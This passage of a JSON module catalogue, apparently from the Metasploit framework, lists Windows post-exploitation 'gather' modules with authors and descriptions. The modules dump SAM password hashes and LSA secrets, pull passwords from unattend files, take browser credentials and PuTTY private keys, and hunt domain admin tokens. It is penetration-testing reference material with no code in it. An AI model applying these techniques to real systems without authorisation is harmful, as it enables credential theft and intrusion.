"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_computers.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_computers",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_db": {
"name": "Windows Gather Database Instance Enumeration",
"full_name": "post/windows/gather/enum_db",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Barry Shteiman <barry@sectorix.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module will enumerate a windows system for installed database instances",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_db.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_db",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_devices": {
"name": "Windows Gather Hardware Enumeration",
"full_name": "post/windows/gather/enum_devices",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "Enumerate PCI hardware information from the registry. Please note this script\n will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID',\n 'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW',\n and 'USB'; it will take time to finish. It is recommended to run this module as a\n background job.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_devices.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_devices",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_dirperms": {
"name": "Windows Gather Directory Permissions Enumeration",
"full_name": "post/windows/gather/enum_dirperms",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kx499",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module enumerates directories and lists the permissions set\n on found directories. Please note: if the PATH option isn't specified,\n then the module will start enumerate whatever is in the target machine's\n %PATH% variable.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_dirperms.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_dirperms",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_domain": {
"name": "Windows Gather Enumerate Domain",
"full_name": "post/windows/gather/enum_domain",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module identifies the primary domain via the registry. The registry value used is:\n HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_domain.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domain",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_domain_group_users": {
"name": "Windows Gather Enumerate Domain Group",
"full_name": "post/windows/gather/enum_domain_group_users",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Stephen Haywood <haywoodsb@gmail.com>"
],
"description": "This module extracts user accounts from specified group\n and stores the results in the loot. It will also verify if session\n account is in the group. Data is stored in loot in a format that\n is compatible with the token_hunter plugin. This module should be\n run over as session with domain credentials.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_domain_group_users.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domain_group_users",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_domain_tokens": {
"name": "Windows Gather Enumerate Domain Tokens",
"full_name": "post/windows/gather/enum_domain_tokens",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate tokens present on a system that are part of the\n domain the target host is part of, will also enumerate users in the local\n Administrators, Users and Backup Operator groups to identify Domain members.\n Processes will be also enumerated and checked if they are running under a\n Domain account, on all checks the accounts, processes and tokens will be\n checked if they are part of the Domain Admin group of the domain the machine\n is a member of.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_domain_tokens.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domain_tokens",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_domain_users": {
"name": "Windows Gather Enumerate Active Domain Users",
"full_name": "post/windows/gather/enum_domain_users",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Etienne Stalmans <etienne@sensepost.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will enumerate computers included in the primary Domain and attempt\n to list all locations the targeted user has sessions on. If the HOST option is specified\n the module will target only that host. If the HOST is specified and USER is set to nil, all users\n logged into that host will be returned.'",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/gather/enum_domain_users.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domain_users",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_domains": {
"name": "Windows Gather Domain Enumeration",
"full_name": "post/windows/gather/enum_domains",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module enumerates currently the domains a host can see and the domain\n controllers for that domain.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_domains.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_domains",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_emet": {
"name": "Windows Gather EMET Protected Paths",
"full_name": "post/windows/gather/enum_emet",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vysec <vincent.yiu@mwrinfosecurity.com>"
],
"description": "This module will enumerate the EMET protected paths on the target host.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_emet.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_emet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_files": {
"name": "Windows Gather Generic File Collection",
"full_name": "post/windows/gather/enum_files",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"3vi1john <Jbabio@me.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module downloads files recursively based on the FILE_GLOBS option.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_files.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_files",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_hostfile": {
"name": "Windows Gather Windows Host File Enumeration",
"full_name": "post/windows/gather/enum_hostfile",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vt <nick.freeman@security-assessment.com>"
],
"description": "This module returns a list of entries in the target system's hosts file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_hostfile.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_hostfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ie": {
"name": "Windows Gather Internet Explorer User Data Enumeration",
"full_name": "post/windows/gather/enum_ie",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kx499"
],
"description": "This module will collect history, cookies, and credentials (from either HTTP\n auth passwords, or saved form passwords found in auto-complete) in\n Internet Explorer. The ability to gather credentials is only supported\n for versions of IE >=7, while history and cookies can be extracted for all\n versions.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_ie.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ie",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_logged_on_users": {
"name": "Windows Gather Logged On User Enumeration (Registry)",
"full_name": "post/windows/gather/enum_logged_on_users",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate current and recently logged on Windows users",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_logged_on_users.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_logged_on_users",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_ms_product_keys": {
"name": "Windows Gather Product Key",
"full_name": "post/windows/gather/enum_ms_product_keys",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module will enumerate the OS license key",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-24 16:06:55 +0000",
"path": "/modules/post/windows/gather/enum_ms_product_keys.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_ms_product_keys",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_muicache": {
"name": "Windows Gather Enum User MUICache",
"full_name": "post/windows/gather/enum_muicache",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"TJ Glad <tjglad@cmail.nu>"
],
"description": "This module gathers information about the files and file paths that logged on users have\n executed on the system. It also will check if the file still exists on the system. This\n information is gathered by using information stored under the MUICache registry key. If\n the user is logged in when the module is executed it will collect the MUICache entries\n by accessing the registry directly. If the user is not logged in the module will download\n users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are\n parsed from the downloaded hive.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_muicache.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_muicache",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_patches": {
"name": "Windows Gather Applied Patches",
"full_name": "post/windows/gather/enum_patches",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"zeroSteiner <zeroSteiner@gmail.com>",
"mubix <mubix@hak5.org>"
],
"description": "This module will attempt to enumerate which patches are applied to a windows system\n based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-02 15:33:48 +0000",
"path": "/modules/post/windows/gather/enum_patches.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_patches",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_powershell_env": {
"name": "Windows Gather Powershell Environment Setting Enumeration",
"full_name": "post/windows/gather/enum_powershell_env",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate Microsoft Powershell settings",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_powershell_env.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_powershell_env",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_prefetch": {
"name": "Windows Gather Prefetch File Information",
"full_name": "post/windows/gather/enum_prefetch",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"TJ Glad <tjglad@cmail.nu>"
],
"description": "This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems\n and current values of related registry keys. From each prefetch file we'll collect\n filetime (converted to utc) of the last execution, file path hash, run count, filename\n and the execution path.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_prefetch.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_prefetch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_proxy": {
"name": "Windows Gather Proxy Setting",
"full_name": "post/windows/gather/enum_proxy",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module pulls a user's proxy settings. If neither RHOST or SID\n are set it pulls the current user, else it will pull the user's settings\n specified SID and target host.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_proxy.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_proxy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_putty_saved_sessions": {
"name": "PuTTY Saved Sessions Enumeration Module",
"full_name": "post/windows/gather/enum_putty_saved_sessions",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session\n information from the registry. PuTTY is very configurable; some users may have configured\n saved sessions which could include a username, private key file to use when authenticating,\n host name etc. If a private key is configured, an attempt will be made to download and store\n it in loot. It will also record the SSH host keys which have been stored. These will be connections that\n the user has previously after accepting the host SSH fingerprint and therefore are of particular\n interest if they are within scope of a penetration test.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_putty_saved_sessions.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_putty_saved_sessions",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_services": {
"name": "Windows Gather Service Info Enumeration",
"full_name": "post/windows/gather/enum_services",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Keith Faber",
"Kx499"
],
"description": "This module will query the system for services and display name and\n configuration info for each returned service. It allows you to\n optionally search the credentials, path, or start type for a string\n and only return the results that match. These query operations are\n cumulative and if no query strings are specified, it just returns all\n services. NOTE: If the script hangs, windows firewall is most likely\n on and you did not migrate to a safe process (explorer.exe for\n example).",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_services.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_services",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_shares": {
"name": "Windows Gather SMB Share Enumeration via Registry",
"full_name": "post/windows/gather/enum_shares",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate configured and recently used file shares",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_shares.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_shares",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_snmp": {
"name": "Windows Gather SNMP Settings Enumeration (Registry)",
"full_name": "post/windows/gather/enum_snmp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Tebo <tebo@attackresearch.com>"
],
"description": "This module will enumerate the SNMP service configuration",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_snmp.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_snmp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_termserv": {
"name": "Windows Gather Terminal Server Client Connection Information Dumper",
"full_name": "post/windows/gather/enum_termserv",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module dumps MRU and connection data for RDP sessions",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_termserv.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_termserv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_tokens": {
"name": "Windows Gather Enumerate Domain Admin Tokens (Token Hunter)",
"full_name": "post/windows/gather/enum_tokens",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua Abraham <jabra@rapid7.com>"
],
"description": "This module will identify systems that have a Domain Admin (delegation) token\n on them. The module will first check if sufficient privileges are present for\n certain actions, and run getprivs for system. If you elevated privs to system,\n the SeAssignPrimaryTokenPrivilege will not be assigned, in that case try\n migrating to another process that is running as system. If no sufficient\n privileges are available, the script will not continue.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_tokens.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_tokens",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_tomcat": {
"name": "Windows Gather Apache Tomcat Enumeration",
"full_name": "post/windows/gather/enum_tomcat",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Barry Shteiman <barry@sectorix.com>"
],
"description": "This module will collect information from a Windows-based Apache Tomcat. You will get\n information such as: The installation path, Tomcat version, port, web applications,\n users, passwords, roles, etc.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_tomcat.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_tomcat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_trusted_locations": {
"name": "Windows Gather Microsoft Office Trusted Locations",
"full_name": "post/windows/gather/enum_trusted_locations",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vysec <vincent.yiu@mwrinfosecurity.com>"
],
"description": "This module will enumerate the Microsoft Office trusted locations on the target host.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_trusted_locations.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_trusted_locations",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/enum_unattend": {
"name": "Windows Gather Unattended Answer File Enumeration",
"full_name": "post/windows/gather/enum_unattend",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sean Verity <veritysr1980@gmail.com>",
"sinn3r <sinn3r@metasploit.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will check the file system for a copy of unattend.xml and/or\n autounattend.xml found in Windows Vista, or newer Windows systems. And then\n extract sensitive information such as usernames and decoded passwords.",
"references": [
"URL-http://technet.microsoft.com/en-us/library/ff715801",
"URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx",
"URL-http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/enum_unattend.rb",
"is_install_path": true,
"ref_name": "windows/gather/enum_unattend",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/file_from_raw_ntfs": {
"name": "Windows File Gather File from Raw NTFS",
"full_name": "post/windows/gather/file_from_raw_ntfs",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Danil Bazin <danil.bazin@hsc.fr>"
],
"description": "This module gathers a file using the raw NTFS device, bypassing some Windows restrictions\n such as open file with write lock. Because it avoids the usual file locking issues, it can\n be used to retrieve files such as NTDS.dit.",
"references": [
"URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/file_from_raw_ntfs.rb",
"is_install_path": true,
"ref_name": "windows/gather/file_from_raw_ntfs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/browser_history": {
"name": "Windows Gather Skype, Firefox, and Chrome Artifacts",
"full_name": "post/windows/gather/forensics/browser_history",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua Harper <josh@radixtx.com>"
],
"description": "Gathers Skype chat logs, Firefox history, and Chrome history data from the target machine.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/browser_history.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/browser_history",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/duqu_check": {
"name": "Windows Gather Forensics Duqu Registry Check",
"full_name": "post/windows/gather/forensics/duqu_check",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Marcus J. Carey <mjc@threatagent.com>"
],
"description": "This module searches for CVE-2011-3402 (Duqu) related registry artifacts.",
"references": [
"CVE-2011-3402",
"URL-http://r-7.co/w5h7fY"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/duqu_check.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/duqu_check",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/enum_drives": {
"name": "Windows Gather Physical Drives and Logical Volumes",
"full_name": "post/windows/gather/forensics/enum_drives",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Wesley McGrew <wesley@mcgrewsecurity.com>"
],
"description": "This module will list physical drives and logical volumes",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/enum_drives.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/enum_drives",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/imager": {
"name": "Windows Gather Forensic Imaging",
"full_name": "post/windows/gather/forensics/imager",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Wesley McGrew <wesley@mcgrewsecurity.com>"
],
"description": "This module will perform byte-for-byte imaging of remote disks and volumes",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/imager.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/imager",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/nbd_server": {
"name": "Windows Gather Local NBD Server",
"full_name": "post/windows/gather/forensics/nbd_server",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Wesley McGrew <wesley@mcgrewsecurity.com>"
],
"description": "Maps remote disks and logical volumes to a local Network Block Device server.\n Allows for forensic tools to be executed on the remote disk directly.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/nbd_server.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/nbd_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/forensics/recovery_files": {
"name": "Windows Gather Deleted Files Enumeration and Recovering",
"full_name": "post/windows/gather/forensics/recovery_files",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module lists and attempts to recover deleted files from NTFS file systems. Use\n the FILES option to guide recovery. Leave this option empty to enumerate deleted files in the\n DRIVE. Set FILES to an extension (e.g., \"pdf\") to recover deleted files with that\n extension, or set FILES to a comma separated list of IDs (from enumeration) to\n recover those files. The user must have account file enumeration. Recovery\n may take a long time; use the TIMEOUT option to abort enumeration or recovery by\n extension after a specified period (in seconds).",
"references": [
"URL-http://www.youtube.com/watch?v=9yzCf360ujY&hd=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/forensics/recovery_files.rb",
"is_install_path": true,
"ref_name": "windows/gather/forensics/recovery_files",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/hashdump": {
"name": "Windows Gather Local User Account Password Hashes (Registry)",
"full_name": "post/windows/gather/hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module will dump the local user accounts from the SAM database using the registry",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/local_admin_search_enum": {
"name": "Windows Gather Local Admin Search",
"full_name": "post/windows/gather/local_admin_search_enum",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>",
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>",
"Royce Davis \"r3dy\" <rdavis@accuvant.com>"
],
"description": "This module will identify systems in a given range that the\n supplied domain user (should migrate into a user pid) has administrative\n access to by using the Windows API OpenSCManagerA to establishing a handle\n to the remote host. Additionally it can enumerate logged in users and group\n membership via Windows API NetWkstaUserEnum and NetUserGetGroups.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/local_admin_search_enum.rb",
"is_install_path": true,
"ref_name": "windows/gather/local_admin_search_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/lsa_secrets": {
"name": "Windows Enumerate LSA Secrets",
"full_name": "post/windows/gather/lsa_secrets",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Rob Bathurst <rob.bathurst@foundstone.com>"
],
"description": "This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:\n HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt\n code from cachedump.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/lsa_secrets.rb",
"is_install_path": true,
"ref_name": "windows/gather/lsa_secrets",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/make_csv_orgchart": {
